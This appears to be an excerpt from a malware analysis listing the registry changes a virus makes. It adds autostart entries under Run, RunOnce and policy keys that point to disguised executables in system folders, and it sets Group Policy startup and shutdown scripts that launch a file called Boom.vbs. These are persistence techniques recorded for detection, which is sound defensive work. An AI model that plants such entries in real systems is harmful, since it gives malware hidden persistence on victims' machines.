HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\sys
Value: String: "C:\WINDOWS\Fonts\Fonts.exe"
Description: adds an autostart entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\@
Value: String: "C:\WINDOWS\system\KEYBOARD.exe"
Description: adds an autostart entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\@
Value: String: "C:\WINDOWS\system32\dllcache\Default.exe"
Description: adds an autostart entry
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown\0\0\Script
Value: String: "C:\WINDOWS\Cursors\Boom.vbs"
Description: launches the virus script at shutdown
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup\0\0\Script
Value: String: "C:\WINDOWS\Cursors\Boom.vbs"
Description: launches the virus script at start-up